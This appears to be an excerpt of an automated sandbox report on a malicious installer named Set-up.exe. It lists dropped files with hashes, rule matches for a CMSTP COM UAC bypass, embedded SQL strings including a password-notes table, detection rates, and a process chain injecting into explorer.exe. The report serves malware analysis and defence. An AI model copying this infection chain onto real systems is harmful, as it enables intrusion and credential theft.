                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_004319E012_2_004319E0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0047B9A012_2_0047B9A0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_00427AD012_2_00427AD0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0065E25012_2_0065E250
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0065B3E012_2_0065B3E0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0065F44012_2_0065F440
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_00663CF012_2_00663CF0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_0047B28015_2_0047B280
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_0047B5F015_2_0047B5F0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_0043F80015_2_0043F800
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_004319E015_2_004319E0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_0047B9A015_2_0047B9A0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_00427AD015_2_00427AD0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_008B23E015_2_008B23E0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_0090855015_2_00908550
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_008749C015_2_008749C0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_008DEAE015_2_008DEAE0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_00880DB015_2_00880DB0
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLFoundation.dll 61209252CA938A4E11CB665A2C2E8D258484433A620DD3F9200A224AAF59618B
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLMessaging.dll 71C3E619E42F1BB56B879334358247C9BB24219E0A3CA12203CE720B765CC12F
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: String function: 00651400 appears 36 times
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: String function: 004A5BDE appears 88 times
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: String function: 0048D050 appears 32 times
                  Source: Set-up.exe, 00000001.00000000.1203929923.00000000013D7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameColorLib.exeH vs Set-up.exe
                  Source: Set-up.exe, 00000001.00000003.1744556998.00000000036F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameColorLib.exeH vs Set-up.exe
                  Source: Set-up.exe, 00000001.00000003.2077780463.00000000045F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDialogL.exeV vs Set-up.exe
                  Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 18.2.explorer.exe.50a9b57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 18.2.explorer.exe.50aa757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 15.2.Server.exe.b278901.23.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.Server.exe.b3c7901.24.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 13.2.more.com.483db57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 23.2.Server.exe.b4195ce.20.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 16.2.more.com.4465a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 23.2.Server.exe.b3d3901.23.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.Server.exe.b40c9ce.22.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 15.2.Server.exe.b2bd9ce.21.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 16.2.more.com.44ab757.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 13.2.more.com.47f8a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.Server.exe.b40d5ce.23.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 23.2.Server.exe.b4189ce.21.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 15.2.Server.exe.b2be5ce.24.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 18.2.explorer.exe.5064a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 13.2.more.com.483e757.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 16.2.more.com.44aab57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@17/57@6/12
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_009D8870 ?ParseDocument@MSXMLParseHandler@xml@dvacore@@UAE?AW4XMLParseStatus@23@ABV?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@@Z,CoCreateInstance,VariantClear,15_2_009D8870
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_00425FF0 ?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,FindResourceW,InterlockedDecrement,?Dispose@Allocator@ASL@@SAXPAXI@Z,?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,LoadResource,InterlockedDecrement,?Dispose@Allocator@ASL@@SAXPAXI@Z,LockResource,?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,SizeofResource,InterlockedDecrement,?Dispose@Allocator@ASL@@SAXPAXI@Z,FreeResource,12_2_00425FF0
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
                  Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\EMBW3N
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeJump to behavior
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_compatibility_version', 1);
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE pcd_meta ( key TEXT NOT NULL, value TEXT NOT NULL, PRIMARY KEY (key) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, PRIMARY KEY (payloadID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE DependencyData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PayloadIDb TEXT ,type TEXT NOT NULL ,product_family TEXT, product_name TEXT, version TEXT, PRIMARY KEY (PayloadID,PayloadIDb,type,product_family,product_name,version));
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE payloads( PayloadID TEXT NOT NULL, productFamily TEXT ,productName TEXT , version TEXT , signature TEXT ,installState INT NOT NULL DEFAULT 0, installTime INT, PRIMARY KEY (PayloadID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, signature TEXT NOT NULL, PRIMARY KEY (payloadID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE ribs_payload_constraint ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE CASCADE, payloadIDb TEXT NOT NULL, constraintType INTEGER NOT NULL, PRIMARY KEY (payloadID, payloadIDb, constraintType) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE payload_data ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (payloadID, domain, key) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL , payloadIDUpgraded TEXT NOT NULL REFERENCES payloads (PayloadID), PRIMARY KEY (payloadIDOriginal, payloadIDUpgraded) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE SuitePayloads( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PRIMARY KEY (ProductID, PayloadID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL REFERENCES ribs_payload (payloadID), payloadIDUpgraded TEXT NOT NULL REFERENCES ribs_payload (payloadID), PRIMARY KEY (payloadIDOriginal) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE ribs_collection ( collectionID TEXT NOT NULL, collectionPayloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, tsInstalled INT, tsModified INT, PRIMARY KEY (collectionID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_version', 1);
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE EULA_Files( productID TEXT NOT NULL, langCode TEXT NOT NULL,eula TEXT NOT NULL,PRIMARY KEY (productID, langCode) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE ribs_collection_payload ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID) ON DELETE CASCADE, payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, installState INT NOT NULL DEFAULT 0, tsInstalled INTEGER, PRIMARY KEY (collectionID, payloadID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE dependency_type( type INTEGER NOT NULL, description TEXT NOT NULL, PRIMARY KEY (type) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE Branding ( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),resource_type TEXT NOT NULL,resource_data TEXT NOT NULL,PRIMARY KEY (ProductID, resource_type) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE pcd_meta SET value = 2 WHERE key = 'schema_version';
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE dependencies( PayloadID TEXT NOT NULL REFERENCES payloads(PayloadID) ON DELETE CASCADE, PayloadIDb TEXT NOT NULL, type INTEGER NOT NULL REFERENCES dependency_types(type), PRIMARY KEY (PayloadID, PayloadIDb) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE Suites( ProductID TEXT NOT NULL, group_name TEXT NOT NULL, group_family TEXT NOT NULL, display_name TEXT NOT NULL, PRIMARY KEY (ProductID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE payload_data ( PayloadID TEXT NOT NULL REFERENCES payloads (PayloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (PayloadID, domain, key) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE collection_data ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (collectionID, domain, key) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE user_actions ( product_id TEXT NOT NULL, actor TEXT , time_action TEXT NOT NULL);
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE PayloadData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),domain TEXT NOT NULL,key TEXT NOT NULL,value TEXT NOT NULL,PRIMARY KEY (PayloadID, domain, key) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE upgraded_payloads SET payloadIDUpgraded = (SELECT second_upgraded.payloadIDUpgraded FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal WHERE upgraded_payloads.payloadIDOriginal = first_upgraded.payloadIDOriginal) WHERE payloadIDOriginal IN (SELECT first_upgraded.payloadIDOriginal FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal);
                  Source: Set-up.exe, 00000001.00000003.1779897782.0000000003D97000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1779964890.0000000003D8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE Payloads( PayloadID TEXT NOT NULL, payload_family TEXT NOT NULL,payload_name TEXT NOT NULL, payload_version TEXT NOT NULL,payload_type TEXT NOT NULL,PRIMARY KEY (PayloadID) );
                  Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE domain_data ( domain TEXT NOT NULL, subDomain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (domain, subDomain, key) );
                  Source: Set-up.exeVirustotal: Detection: 33%
                  Source: Set-up.exeReversingLabs: Detection: 50%
                  Source: K07BOQJSAWQXKEH8FTYNN.exeString found in binary or memory: gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in
                  Source: K07BOQJSAWQXKEH8FTYNN.exeString found in binary or memory: gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in
                  Source: K07BOQJSAWQXKEH8FTYNN.exeString found in binary or memory: eep-alive interval must be positivelfstack node allocated from the heapruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
                  Source: K07BOQJSAWQXKEH8FTYNN.exeString found in binary or memory: eep-alive interval must be positivelfstack node allocated from the heapruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
                  Source: K07BOQJSAWQXKEH8FTYNN.exeString found in binary or memory: f69vUBGv/addrselect.go
                  Source: K07BOQJSAWQXKEH8FTYNN.exeString found in binary or memory: mePFrj3evm/addr.go
                  Source: K07BOQJSAWQXKEH8FTYNN.exeString found in binary or memory: ucHJiE4/addr.go
                  Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
                  Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe "C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe"
                  Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe"
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\rareTemp.exe "C:\Users\user\AppData\Local\Temp\rareTemp.exe"
